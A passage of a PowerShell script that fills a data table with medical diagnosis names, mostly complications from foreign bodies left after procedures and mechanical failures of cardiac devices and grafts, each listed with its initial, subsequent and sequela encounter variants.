= $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following removal of catheter or packing","Adhesions due to foreign body accidentally left in body following removal of catheter or packing, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following other procedure","Adhesions due to foreign body accidentally left in body following other procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following other procedure","Adhesions due to foreign body accidentally left in body following other procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following other procedure","Adhesions due to foreign body accidentally left in body following other procedure, sequela") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following unspecified procedure","Adhesions due to foreign body accidentally left in body following unspecified procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following unspecified procedure","Adhesions due to foreign body accidentally left in body following unspecified procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adhesions due to foreign body accidentally left in body following unspecified procedure","Adhesions due to foreign body accidentally left in body following unspecified procedure, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following surgical operation","Obstruction due to foreign body accidentally left in body following surgical operation, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following surgical operation","Obstruction due to foreign body accidentally left in body following surgical operation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following surgical operation","Obstruction due to foreign body accidentally left in body following surgical operation, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following infusion or transfusion","Obstruction due to foreign body accidentally left in body following infusion or transfusion, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following infusion or transfusion","Obstruction due to foreign body accidentally left in body following infusion or transfusion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following infusion or transfusion","Obstruction due to foreign body accidentally left in body following infusion or transfusion, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following kidney dialysis","Obstruction due to foreign body accidentally left in body following kidney dialysis, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following kidney dialysis","Obstruction due to foreign body accidentally left in body following kidney dialysis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following kidney dialysis","Obstruction due to foreign body accidentally left in body following kidney dialysis, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following injection or immunization","Obstruction due to foreign body accidentally left in body following injection or immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following injection or immunization","Obstruction due to foreign body accidentally left in body following injection or immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following injection or immunization","Obstruction due to foreign body accidentally left in body following injection or immunization, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following endoscopic examination","Obstruction due to foreign body accidentally left in body following endoscopic examination, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following endoscopic examination","Obstruction due to foreign body accidentally left in body following endoscopic examination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following endoscopic examination","Obstruction due to foreign body accidentally left in body following endoscopic examination, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following heart catheterization","Obstruction due to foreign body accidentally left in body following heart catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following heart catheterization","Obstruction due to foreign body accidentally left in body following heart catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following heart catheterization","Obstruction due to foreign body accidentally left in body following heart catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Obstruction due to foreign body accidentally left in body following aspiration, puncture or other catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following removal of catheter or packing","Obstruction due to foreign body accidentally left in body following removal of catheter or packing, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following removal of catheter or packing","Obstruction due to foreign body accidentally left in body following removal of catheter or packing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following removal of catheter or packing","Obstruction due to foreign body accidentally left in body following removal of catheter or packing, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following other procedure","Obstruction due to foreign body accidentally left in body following other procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following other procedure","Obstruction due to foreign body accidentally left in body following other procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following other procedure","Obstruction due to foreign body accidentally left in body following other procedure, sequela") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following unspecified procedure","Obstruction due to foreign body accidentally left in body following unspecified procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following unspecified procedure","Obstruction due to foreign body accidentally left in body following unspecified procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Obstruction due to foreign body accidentally left in body following unspecified procedure","Obstruction due to foreign body accidentally left in body following unspecified procedure, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following surgical operation","Perforation due to foreign body accidentally left in body following surgical operation, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following surgical operation","Perforation due to foreign body accidentally left in body following surgical operation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following surgical operation","Perforation due to foreign body accidentally left in body following surgical operation, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following infusion or transfusion","Perforation due to foreign body accidentally left in body following infusion or transfusion, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following infusion or transfusion","Perforation due to foreign body accidentally left in body following infusion or transfusion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following infusion or transfusion","Perforation due to foreign body accidentally left in body following infusion or transfusion, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following kidney dialysis","Perforation due to foreign body accidentally left in body following kidney dialysis, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following kidney dialysis","Perforation due to foreign body accidentally left in body following kidney dialysis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following kidney dialysis","Perforation due to foreign body accidentally left in body following kidney dialysis, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following injection or immunization","Perforation due to foreign body accidentally left in body following injection or immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following injection or immunization","Perforation due to foreign body accidentally left in body following injection or immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following injection or immunization","Perforation due to foreign body accidentally left in body following injection or immunization, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following endoscopic examination","Perforation due to foreign body accidentally left in body following endoscopic examination, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following endoscopic examination","Perforation due to foreign body accidentally left in body following endoscopic examination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following endoscopic examination","Perforation due to foreign body accidentally left in body following endoscopic examination, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following heart catheterization","Perforation due to foreign body accidentally left in body following heart catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following heart catheterization","Perforation due to foreign body accidentally left in body following heart catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following heart catheterization","Perforation due to foreign body accidentally left in body following heart catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization","Perforation due to foreign body accidentally left in body following aspiration, puncture or other catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following removal of catheter or packing","Perforation due to foreign body accidentally left in body following removal of catheter or packing, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following removal of catheter or packing","Perforation due to foreign body accidentally left in body following removal of catheter or packing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following removal of catheter or packing","Perforation due to foreign body accidentally left in body following removal of catheter or packing, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following other procedure","Perforation due to foreign body accidentally left in body following other procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following other procedure","Perforation due to foreign body accidentally left in body following other procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following other procedure","Perforation due to foreign body accidentally left in body following other procedure, sequela") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following unspecified procedure","Perforation due to foreign body accidentally left in body following unspecified procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following unspecified procedure","Perforation due to foreign body accidentally left in body following unspecified procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Perforation due to foreign body accidentally left in body following unspecified procedure","Perforation due to foreign body accidentally left in body following unspecified procedure, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following surgical operation","Other complications of foreign body accidentally left in body following surgical operation, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following surgical operation","Other complications of foreign body accidentally left in body following surgical operation, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following surgical operation","Other complications of foreign body accidentally left in body following surgical operation, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following infusion or transfusion","Other complications of foreign body accidentally left in body following infusion or transfusion, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following infusion or transfusion","Other complications of foreign body accidentally left in body following infusion or transfusion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following infusion or transfusion","Other complications of foreign body accidentally left in body following infusion or transfusion, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following kidney dialysis","Other complications of foreign body accidentally left in body following kidney dialysis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following kidney dialysis","Other complications of foreign body accidentally left in body following kidney dialysis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following kidney dialysis","Other complications of foreign body accidentally left in body following kidney dialysis, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following injection or immunization","Other complications of foreign body accidentally left in body following injection or immunization, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following injection or immunization","Other complications of foreign body accidentally left in body following injection or immunization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following injection or immunization","Other complications of foreign body accidentally left in body following injection or immunization, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following endoscopic examination","Other complications of foreign body accidentally left in body following endoscopic examination, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following endoscopic examination","Other complications of foreign body accidentally left in body following endoscopic examination, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following endoscopic examination","Other complications of foreign body accidentally left in body following endoscopic examination, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following heart catheterization","Other complications of foreign body accidentally left in body following heart catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following heart catheterization","Other complications of foreign body accidentally left in body following heart catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following heart catheterization","Other complications of foreign body accidentally left in body following heart catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization","Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization","Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization","Other complications of foreign body accidentally left in body following aspiration, puncture or other catheterization, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following removal of catheter or packing","Other complications of foreign body accidentally left in body following removal of catheter or packing, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following removal of catheter or packing","Other complications of foreign body accidentally left in body following removal of catheter or packing, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following removal of catheter or packing","Other complications of foreign body accidentally left in body following removal of catheter or packing, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following other procedure","Other complications of foreign body accidentally left in body following other procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following other procedure","Other complications of foreign body accidentally left in body following other procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following other procedure","Other complications of foreign body accidentally left in body following other procedure, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following unspecified procedure","Other complications of foreign body accidentally left in body following unspecified procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following unspecified procedure","Other complications of foreign body accidentally left in body following unspecified procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of foreign body accidentally left in body following unspecified procedure","Other complications of foreign body accidentally left in body following unspecified procedure, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified acute reaction to foreign substance accidentally left during a procedure","Unspecified acute reaction to foreign substance accidentally left during a procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified acute reaction to foreign substance accidentally left during a procedure","Unspecified acute reaction to foreign substance accidentally left during a procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified acute reaction to foreign substance accidentally left during a procedure","Unspecified acute reaction to foreign substance accidentally left during a procedure, sequela") + $null = $DiagnosisList.Rows.Add("Aseptic peritonitis due to foreign substance accidentally left during a procedure","Aseptic peritonitis due to foreign substance accidentally left during a procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Aseptic peritonitis due to foreign substance accidentally left during a procedure","Aseptic peritonitis due to foreign substance accidentally left during a procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Aseptic peritonitis due to foreign substance accidentally left during a procedure","Aseptic peritonitis due to foreign substance accidentally left during a procedure, sequela") + $null = $DiagnosisList.Rows.Add("Other acute reaction to foreign substance accidentally left during a procedure","Other acute reaction to foreign substance accidentally left during a procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other acute reaction to foreign substance accidentally left during a procedure","Other acute reaction to foreign substance accidentally left during a procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other acute reaction to foreign substance accidentally left during a procedure","Other acute reaction to foreign substance accidentally left during a procedure, sequela") + $null = $DiagnosisList.Rows.Add("Complication of mesenteric artery following a procedure, not elsewhere classified","Complication of mesenteric artery following a procedure, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of mesenteric artery following a procedure, not elsewhere classified","Complication of mesenteric artery following a procedure, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of mesenteric artery following a procedure, not elsewhere classified","Complication of mesenteric artery following a procedure, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of renal artery following a procedure, not elsewhere classified","Complication of renal artery following a procedure, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of renal artery following a procedure, not elsewhere classified","Complication of renal artery following a procedure, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of renal artery following a procedure, not elsewhere classified","Complication of renal artery following a procedure, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of other artery following a procedure, not elsewhere classified","Complication of other artery following a procedure, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of other artery following a procedure, not elsewhere classified","Complication of other artery following a procedure, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of other artery following a procedure, not elsewhere classified","Complication of other artery following a procedure, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of unspecified artery following a procedure, not elsewhere classified","Complication of unspecified artery following a procedure, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of unspecified artery following a procedure, not elsewhere classified","Complication of unspecified artery following a procedure, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of unspecified artery following a procedure, not elsewhere classified","Complication of unspecified artery following a procedure, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of vein following a procedure, not elsewhere classified","Complication of vein following a procedure, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of vein following a procedure, not elsewhere classified","Complication of vein following a procedure, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of vein following a procedure, not elsewhere classified","Complication of vein following a procedure, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Complication of inhalation therapy","Complication of inhalation therapy, initial encounter") + $null = $DiagnosisList.Rows.Add("Complication of inhalation therapy","Complication of inhalation therapy, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complication of inhalation therapy","Complication of inhalation therapy, sequela") + $null = $DiagnosisList.Rows.Add("Emphysema (subcutaneous) resulting from a procedure","Emphysema (subcutaneous) resulting from a procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Emphysema (subcutaneous) resulting from a procedure","Emphysema (subcutaneous) resulting from a procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Emphysema (subcutaneous) resulting from a procedure","Emphysema (subcutaneous) resulting from a procedure, sequela") + $null = $DiagnosisList.Rows.Add("Persistent postprocedural fistula","Persistent postprocedural fistula, initial encounter") + $null = $DiagnosisList.Rows.Add("Persistent postprocedural fistula","Persistent postprocedural fistula, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Persistent postprocedural fistula","Persistent postprocedural fistula, sequela") + $null = $DiagnosisList.Rows.Add("Other complications of procedures, not elsewhere classified","Other complications of procedures, not elsewhere classified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other complications of procedures, not elsewhere classified","Other complications of procedures, not elsewhere classified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other complications of procedures, not elsewhere classified","Other complications of procedures, not elsewhere classified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified complication of procedure","Unspecified complication of procedure, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of procedure","Unspecified complication of procedure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified complication of procedure","Unspecified complication of procedure, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of heart valve prosthesis","Breakdown (mechanical) of heart valve prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of heart valve prosthesis","Breakdown (mechanical) of heart valve prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of heart valve prosthesis","Breakdown (mechanical) of heart valve prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of heart valve prosthesis","Displacement of heart valve prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of heart valve prosthesis","Displacement of heart valve prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of heart valve prosthesis","Displacement of heart valve prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of heart valve prosthesis","Leakage of heart valve prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of heart valve prosthesis","Leakage of heart valve prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of heart valve prosthesis","Leakage of heart valve prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of heart valve prosthesis","Other mechanical complication of heart valve prosthesis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of heart valve prosthesis","Other mechanical complication of heart valve prosthesis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of heart valve prosthesis","Other mechanical complication of heart valve prosthesis, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac electrode","Breakdown (mechanical) of cardiac electrode, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac electrode","Breakdown (mechanical) of cardiac electrode, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac electrode","Breakdown (mechanical) of cardiac electrode, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac pulse generator (battery)","Breakdown (mechanical) of cardiac pulse generator (battery), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac pulse generator (battery)","Breakdown (mechanical) of cardiac pulse generator (battery), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of cardiac pulse generator (battery)","Breakdown (mechanical) of cardiac pulse generator (battery), sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac electronic device","Breakdown (mechanical) of other cardiac electronic device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac electronic device","Breakdown (mechanical) of other cardiac electronic device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of other cardiac electronic device","Breakdown (mechanical) of other cardiac electronic device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac electronic device","Breakdown (mechanical) of unspecified cardiac electronic device, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac electronic device","Breakdown (mechanical) of unspecified cardiac electronic device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of unspecified cardiac electronic device","Breakdown (mechanical) of unspecified cardiac electronic device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac electrode","Displacement of cardiac electrode, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac electrode","Displacement of cardiac electrode, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac electrode","Displacement of cardiac electrode, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac pulse generator (battery)","Displacement of cardiac pulse generator (battery), initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac pulse generator (battery)","Displacement of cardiac pulse generator (battery), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of cardiac pulse generator (battery)","Displacement of cardiac pulse generator (battery), sequela") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac electronic device","Displacement of other cardiac electronic device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac electronic device","Displacement of other cardiac electronic device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of other cardiac electronic device","Displacement of other cardiac electronic device, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac electronic device","Displacement of unspecified cardiac electronic device, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac electronic device","Displacement of unspecified cardiac electronic device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of unspecified cardiac electronic device","Displacement of unspecified cardiac electronic device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac electrode","Other mechanical complication of cardiac electrode, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac electrode","Other mechanical complication of cardiac electrode, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac electrode","Other mechanical complication of cardiac electrode, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac pulse generator (battery)","Other mechanical complication of cardiac pulse generator (battery), initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac pulse generator (battery)","Other mechanical complication of cardiac pulse generator (battery), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of cardiac pulse generator (battery)","Other mechanical complication of cardiac pulse generator (battery), sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac electronic device","Other mechanical complication of other cardiac electronic device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac electronic device","Other mechanical complication of other cardiac electronic device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of other cardiac electronic device","Other mechanical complication of other cardiac electronic device, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac device","Other mechanical complication of unspecified cardiac device, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac device","Other mechanical complication of unspecified cardiac device, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of unspecified cardiac device","Other mechanical complication of unspecified cardiac device, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of coronary artery bypass graft","Breakdown (mechanical) of coronary artery bypass graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of coronary artery bypass graft","Breakdown (mechanical) of coronary artery bypass graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of coronary artery bypass graft","Breakdown (mechanical) of coronary artery bypass graft, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of coronary artery bypass graft","Displacement of coronary artery bypass graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of coronary artery bypass graft","Displacement of coronary artery bypass graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of coronary artery bypass graft","Displacement of coronary artery bypass graft, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of coronary artery bypass graft","Leakage of coronary artery bypass graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of coronary artery bypass graft","Leakage of coronary artery bypass graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of coronary artery bypass graft","Leakage of coronary artery bypass graft, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of coronary artery bypass graft","Other mechanical complication of coronary artery bypass graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of coronary artery bypass graft","Other mechanical complication of coronary artery bypass graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of coronary artery bypass graft","Other mechanical complication of coronary artery bypass graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of biological heart valve graft","Breakdown (mechanical) of biological heart valve graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of biological heart valve graft","Breakdown (mechanical) of biological heart valve graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of biological heart valve graft","Breakdown (mechanical) of biological heart valve graft, sequela") + $null = $DiagnosisList.Rows.Add("Displacement of biological heart valve graft","Displacement of biological heart valve graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Displacement of biological heart valve graft","Displacement of biological heart valve graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Displacement of biological heart valve graft","Displacement of biological heart valve graft, sequela") + $null = $DiagnosisList.Rows.Add("Leakage of biological heart valve graft","Leakage of biological heart valve graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Leakage of biological heart valve graft","Leakage of biological heart valve graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Leakage of biological heart valve graft","Leakage of biological heart valve graft, sequela") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of biological heart valve graft","Other mechanical complication of biological heart valve graft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of biological heart valve graft","Other mechanical complication of biological heart valve graft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other mechanical complication of biological heart valve graft","Other mechanical complication of biological heart valve graft, sequela") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of aortic (bifurcation) graft (replacement)","Breakdown (mechanical) of aortic (bifurcation) graft (replacement), initial encounter") + $null = $DiagnosisList.Rows.Add("Breakdown (mechanical) of aortic (bifurcation) graft (replacement)","Breakdown (mechanical) of aortic (bifurcation) graft (replacement), subsequent encounter") + $null 